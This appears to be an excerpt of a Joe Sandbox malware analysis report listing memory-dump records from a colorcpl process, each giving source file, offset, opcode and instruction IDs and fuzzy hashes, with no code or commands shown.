                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bf3f0434dff335bfe690e83c8215db02d0f2f7dd5f67888c9307a503729f2ad6
                                                                                                    • Instruction ID: a721994898577175618fde4a52a78e6551df690a81bd945bcc35d817cb0587df
                                                                                                    • Opcode Fuzzy Hash: bf3f0434dff335bfe690e83c8215db02d0f2f7dd5f67888c9307a503729f2ad6
                                                                                                    • Instruction Fuzzy Hash: 5F41A2B5D00359EEDB10CFAAD980AEDFBF4BB49700F90826EE559A7241DB305A84CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                    • Instruction ID: a14acf4fa1c48843b708f4a845ef4344f0af664ddf17fbb92513d66766d4ffa0
                                                                                                    • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                    • Instruction Fuzzy Hash: 18318EB1E00125EBD744DF69C480AAEB7F1FF49311F158269D894DB351D734EA51CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1925d21079dc9b2cd4084dc6c7d8ee0d2a7bd9910c5ac426619cf122651f5061
                                                                                                    • Instruction ID: 8fa4ea107c91d4d3edc7955251436c2e2e7437d1ef8212e189a013729ed422a1
                                                                                                    • Opcode Fuzzy Hash: 1925d21079dc9b2cd4084dc6c7d8ee0d2a7bd9910c5ac426619cf122651f5061
                                                                                                    • Instruction Fuzzy Hash: DF31B136D0038AEBDB11CE85CC40F8A7BA9FF45760F9142A5E9409B250C3B1ED64DB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3f7ef6010d119159a70e55a1c2896d0bec07369feaf947745203de0cc9ded3fb
                                                                                                    • Instruction ID: 2abf027dfd793936648015ac399d1ba74203457070f6d72f113305170f5fbb58
                                                                                                    • Opcode Fuzzy Hash: 3f7ef6010d119159a70e55a1c2896d0bec07369feaf947745203de0cc9ded3fb
                                                                                                    • Instruction Fuzzy Hash: 52314876600650EFC711CF18CC80F4AB7B9EF85790F988269E558CF242DA35ED41CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5aa1581b76ec844e0a832e4b9bd8de25188f6a49d7b1f7b03bea876260e42600
                                                                                                    • Instruction ID: 4bdca27aac98961131c61d057baf4afdcbfa6c6f8e58c27bae06488865ca9504
                                                                                                    • Opcode Fuzzy Hash: 5aa1581b76ec844e0a832e4b9bd8de25188f6a49d7b1f7b03bea876260e42600
                                                                                                    • Instruction Fuzzy Hash: 0531E17A6206A2DFD701DF59C4C039A37B5EF1D350F914279EC88DB200E774DA028B84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c034d317b1ff391979d239163e6d70ad04abefaf774b5bfe93cec8477e7b3e55
                                                                                                    • Instruction ID: 0e8f229b7a26f120089bb6d0d65b91b3647495013a780a06d136d6f58c491752
                                                                                                    • Opcode Fuzzy Hash: c034d317b1ff391979d239163e6d70ad04abefaf774b5bfe93cec8477e7b3e55
                                                                                                    • Instruction Fuzzy Hash: 5C31C470A107828BD314CF6AC544716BBEAFFC6324F98CB2DD4A987290D770D809CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5792c921ca3ca2bbbe232b517931b81ea903973909e8099156e3e3dd86bc70c3
                                                                                                    • Instruction ID: a77043030397b8386b2a9b5e320b294f0f9a8c08c7ffd9efd36645547f524617
                                                                                                    • Opcode Fuzzy Hash: 5792c921ca3ca2bbbe232b517931b81ea903973909e8099156e3e3dd86bc70c3
                                                                                                    • Instruction Fuzzy Hash: D221AE39640254EFD711DB9ACD80E9BBBBAEF85B81FA14669E51997310D230EE40CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: df5ecbe202d80c9431c8cab0418e71b00cd63dff9c6539d5b7919d4bab28d3b7
                                                                                                    • Instruction ID: b05b99baeb62c4186931e1af8efb90266c115b46b666ffcf73826844dbae3600
                                                                                                    • Opcode Fuzzy Hash: df5ecbe202d80c9431c8cab0418e71b00cd63dff9c6539d5b7919d4bab28d3b7
                                                                                                    • Instruction Fuzzy Hash: D1319F39621986FFD7019F25DE44A8ABBA6FF8A350F946621E90147A61D735FC30CB80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c93c25ceb6864824127cd0c1b1bca1bacde47f0bda7bbca02f2b2e7e43e2787d
                                                                                                    • Instruction ID: 7efc0dff1a1ad7e66700cb20e9b8aef55134095355038f3b93d1209f19815f2c
                                                                                                    • Opcode Fuzzy Hash: c93c25ceb6864824127cd0c1b1bca1bacde47f0bda7bbca02f2b2e7e43e2787d
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5d88f45dd0001f0d62fa2f1ec0471271e7e01065537810ddf14d08d74697b0f9
                                                                                                    • Instruction ID: 458a976cc54b0a0a72ece3e287d295966737298e48beb1fa692e8f998e93a12e
                                                                                                    • Opcode Fuzzy Hash: 5d88f45dd0001f0d62fa2f1ec0471271e7e01065537810ddf14d08d74697b0f9
                                                                                                    • Instruction Fuzzy Hash: CF21F274E012498BF701CF69C0547EEBBB9EB8931AF758228C82A573D0CBB89845C758
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 279751e000c75b3e3a4caf8ad9a84f939f4216867475f6537399e36d33891942
                                                                                                    • Instruction ID: 9f84b60dba393aaed81bf06a31ec4687911a4b8e3da554d5367cd4146a9d9443
                                                                                                    • Opcode Fuzzy Hash: 279751e000c75b3e3a4caf8ad9a84f939f4216867475f6537399e36d33891942
                                                                                                    • Instruction Fuzzy Hash: 36215971A12682DFD305CF54C280604B7F6FBAA314B90CA7EC026CF691DB30A442CF05
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 435ec20441679b49d0b9dc85c30e969150b76baf59bf81e95e4903d21b534327
                                                                                                    • Instruction ID: c78a12c9515744c72e231c08a760e0689a448c8ed60788396e5fb9c45edcb1db
                                                                                                    • Opcode Fuzzy Hash: 435ec20441679b49d0b9dc85c30e969150b76baf59bf81e95e4903d21b534327
                                                                                                    • Instruction Fuzzy Hash: AC112936A155D6DBD3019F1ACC10B55379AAF8A750F9407A1FE428B391EB39FD00C3A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2d7193f1e1caba985134c5dc1c82937ca3a0aad0c498a0644f45b1c7af5418cd
                                                                                                    • Instruction ID: bf7e518457143af7090d27b02f6de01d7f89da2326e6c7cbf0dada1bb374ee72
                                                                                                    • Opcode Fuzzy Hash: 2d7193f1e1caba985134c5dc1c82937ca3a0aad0c498a0644f45b1c7af5418cd
                                                                                                    • Instruction Fuzzy Hash: F5113F78252AD2CBD7148B6AC0A0BA173E9FB0A714F98065AE8CA87754D37ADC81C710
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 84d8c099071c2c2e27e0d7cc270b2f1a9f3cfe9a568463a6261584609a9bdb37
                                                                                                    • Instruction ID: a1f1659c767ae1a18c0e495b6161840941de1225dd4d560abce6eb817ffa20de
                                                                                                    • Opcode Fuzzy Hash: 84d8c099071c2c2e27e0d7cc270b2f1a9f3cfe9a568463a6261584609a9bdb37
                                                                                                    • Instruction Fuzzy Hash: 55110635610684AFDB01DF66C540B9ABBF6EF9A354F604A6AD49A97300E770F901CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ff33570f2c2ac336df972e6f694a79a871e76e2bff359fe41781ddbb4369fb16
                                                                                                    • Instruction ID: ee51aa6731eb5fcef2869f339187e263c7c3a234e9f0bcaf4bd0530e5128c16d
                                                                                                    • Opcode Fuzzy Hash: ff33570f2c2ac336df972e6f694a79a871e76e2bff359fe41781ddbb4369fb16
                                                                                                    • Instruction Fuzzy Hash: E9210375A022C9DFEB029FA8C940BDDBBB5FF16704FA406A9E5009B391C7799D00C768
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 512b137ad89a7df6b990cf685ed85c22080462fca4e19b5674eeca6d299f7e61
                                                                                                    • Instruction ID: 6408e6eb3aa9cf878809b8c4ce785bfb06e89b58256dcf50642616031da25b3a
                                                                                                    • Opcode Fuzzy Hash: 512b137ad89a7df6b990cf685ed85c22080462fca4e19b5674eeca6d299f7e61
                                                                                                    • Instruction Fuzzy Hash: 8F214471A0038ADBDB08CF94D890BECB3B1FB49721FA4831AE465A6280D7786945CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0f0029a5fddd162ff8ec647c63b68ca8ae11ce565b8650359554b74b1a6a5eab
                                                                                                    • Instruction ID: 49ca17d5b7bcd59b0c2f183cb7449571dbb6cc2eae53a43b274283d9c08f5271
                                                                                                    • Opcode Fuzzy Hash: 0f0029a5fddd162ff8ec647c63b68ca8ae11ce565b8650359554b74b1a6a5eab
                                                                                                    • Instruction Fuzzy Hash: 07110A32B10156ABDB049B58C984A5EB7BDAF4C790F5D426DE405E3300DF749D00C794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4870b528d7b25b4471f0b5810bc38dc9778e41db59f1a3cb7c06885f010ffa25
                                                                                                    • Instruction ID: 1418eb29ae7b92fa76828ddfdc43fd133ddfdd8c05150317b8598073ab21796a
                                                                                                    • Opcode Fuzzy Hash: 4870b528d7b25b4471f0b5810bc38dc9778e41db59f1a3cb7c06885f010ffa25
                                                                                                    • Instruction Fuzzy Hash: 0C119035600346EFDB25CF61CC14F5AB7AAEB86314F9486A9E441AB280D771BD82CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6ed659946fb9fc9b79206869a8043569f9835a961de5c7259737506ae61f8194
                                                                                                    • Instruction ID: dae6a4c809f9849d89ba2a1eeecf6f9f9b1bb18dc009edc394850fc93caf2f5a
                                                                                                    • Opcode Fuzzy Hash: 6ed659946fb9fc9b79206869a8043569f9835a961de5c7259737506ae61f8194
                                                                                                    • Instruction Fuzzy Hash: F9112B36252694BFC7225F45CD51F1B3B7AEF8DB80F510A28B6045B2A0C771DC00D794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 93f4e7af98a6c385ea36c919ef03bbe4d37044313034a9aa39d0b50dfd9d5ba1
                                                                                                    • Instruction ID: b769fb1442875da443bfb3f9669ef425b9ef7899d847a575db8ec909a1901216
                                                                                                    • Opcode Fuzzy Hash: 93f4e7af98a6c385ea36c919ef03bbe4d37044313034a9aa39d0b50dfd9d5ba1
                                                                                                    • Instruction Fuzzy Hash: EB01D226B01145DBCB059A6D8C60B7AB38BABE5220F944335E575C7388DE34F81282A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 012a71606a4d59d9462653767c3d49fe1bd4ebf1bf8dc5cce1905e6e7a89c31f
                                                                                                    • Instruction ID: 1c5b80b79caec7044b15583acd0ee277debe14f85325621d5fdad3bff6f97b58
                                                                                                    • Opcode Fuzzy Hash: 012a71606a4d59d9462653767c3d49fe1bd4ebf1bf8dc5cce1905e6e7a89c31f
                                                                                                    • Instruction Fuzzy Hash: F6112132904248BFCB019F6CC8808BEBBB9EFD9304F50816AF9448B250CB319D40C7A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 60c823d4a219f1a9f007e6fc68887373275c2c513e16b3fc8dced40f8957b3e8
                                                                                                    • Instruction ID: a66bff46b9094bb12273d03c8e52f6f5e81f89c43fc52e67f04a29a897087586
                                                                                                    • Opcode Fuzzy Hash: 60c823d4a219f1a9f007e6fc68887373275c2c513e16b3fc8dced40f8957b3e8
                                                                                                    • Instruction Fuzzy Hash: 750104751026A39BC3168A15D850E267BB7DFC6B507D58A7DE8498B300DB38F801CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                                    • Instruction ID: 5d13d8ea6f86f1a925fc3647abd25536cd54f56c5f7145502e31faa5f5385e35
                                                                                                    • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 64789c6ddbead33302fac3212ecdc079511659893230da43a9a81759dace1cf8
                                                                                                    • Instruction ID: de745a2eae4c0274d32863e72937c12410a2d992c8636a1780f53ffdf5c16554
                                                                                                    • Opcode Fuzzy Hash: 64789c6ddbead33302fac3212ecdc079511659893230da43a9a81759dace1cf8
                                                                                                    • Instruction Fuzzy Hash: 39F0FF3A7421D06ADB2527A18D24F2A372ADBD5BA1FE00E38B6004F6A0DB14AC00C34C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b9a720d99e092428df2c9411d9c4715118aa9b165e762b3b3b92662b8f60105c
                                                                                                    • Instruction ID: d497484891db3e009b0684590bf022850389d3d55e8b6e8419ce9098c5564800
                                                                                                    • Opcode Fuzzy Hash: b9a720d99e092428df2c9411d9c4715118aa9b165e762b3b3b92662b8f60105c
                                                                                                    • Instruction Fuzzy Hash: 8F014436A11688EFE710CB44CC08F4A33E8DB12F21FA08743EC289B290D735EC408785
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6c5558550ec265d813efd806e32b6cd256fdf6c6e665e2175b5cb3775afe045d
                                                                                                    • Instruction ID: 85023f3854314e6ef0d506650d17490abe5bf74b41be954bb5e642e02edec934
                                                                                                    • Opcode Fuzzy Hash: 6c5558550ec265d813efd806e32b6cd256fdf6c6e665e2175b5cb3775afe045d
                                                                                                    • Instruction Fuzzy Hash: EBF0C836E1124CABDB04DBB9C905AEEB7B8EF45710F40855AF501F72C0DA74E9018B95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4591191befd7c5beb4969d763fd59f5eb86e9bd1e44db9431eda3793a83f3aea
                                                                                                    • Instruction ID: 501e1f9f829e48c40fc033499bf69d04d20fac25180e6459284f42fddc405d5b
                                                                                                    • Opcode Fuzzy Hash: 4591191befd7c5beb4969d763fd59f5eb86e9bd1e44db9431eda3793a83f3aea
                                                                                                    • Instruction Fuzzy Hash: FEF03C76B02214ABDB15DA59C940FAE77BEDF89700F940269A901A7280DB74BE01CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8a8d0794c21b666e36e0dc79bb50e3d066cc9739cc40bb011b89da3e269756a6
                                                                                                    • Instruction ID: e600632cf89d79db362bcfb4bcd2e04a9653055b73be8337fad12e4070b9898d
                                                                                                    • Opcode Fuzzy Hash: 8a8d0794c21b666e36e0dc79bb50e3d066cc9739cc40bb011b89da3e269756a6
                                                                                                    • Instruction Fuzzy Hash: D2F0F635B11248ABDB04DBB9C915E7EB3B8EF55700F804569F501EB6D0EA70E901C755
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b0c9e1138bf08bfd7576430339e0cbf29eabd9c0b51781b0a2b60c8ef6cb374a
                                                                                                    • Instruction ID: bf0f4b508e0e0f48315462b591650e665b1cc6c248d30a5b5539880f4124e682
                                                                                                    • Opcode Fuzzy Hash: b0c9e1138bf08bfd7576430339e0cbf29eabd9c0b51781b0a2b60c8ef6cb374a
                                                                                                    • Instruction Fuzzy Hash: EDF0B477B0316157D2308B9CE850B6A3368EBCAF61F610739F941DB740E714E8019A94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 939d35e01c02f87bdc7d116ee6a10a3add43fdf3b6bd4552ab9fa976b7bf1466
                                                                                                    • Instruction ID: 8ccf70e5592a70f0c9c9d55e3f8637098f3a95fd522474525a0c868bf7738559
                                                                                                    • Opcode Fuzzy Hash: 939d35e01c02f87bdc7d116ee6a10a3add43fdf3b6bd4552ab9fa976b7bf1466
                                                                                                    • Instruction Fuzzy Hash: 09F0C837100744AFE7119A69D840F93B7EEBFC2B04F414A19E64687554DB74F441CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                    • Instruction ID: 7acc4444c0a11a48f1b23ad720524682fb7018f27101083bca04be7f36591a25
                                                                                                    • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                    • Instruction Fuzzy Hash: 2EF04FBA940244BFE711DBA4CD41FDB77FCEB04714F100666A955D6190EA70AA44CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a174de0e20a84e4e462ad37a34075d61457da5c0f2ce69c74170702235a7cc26
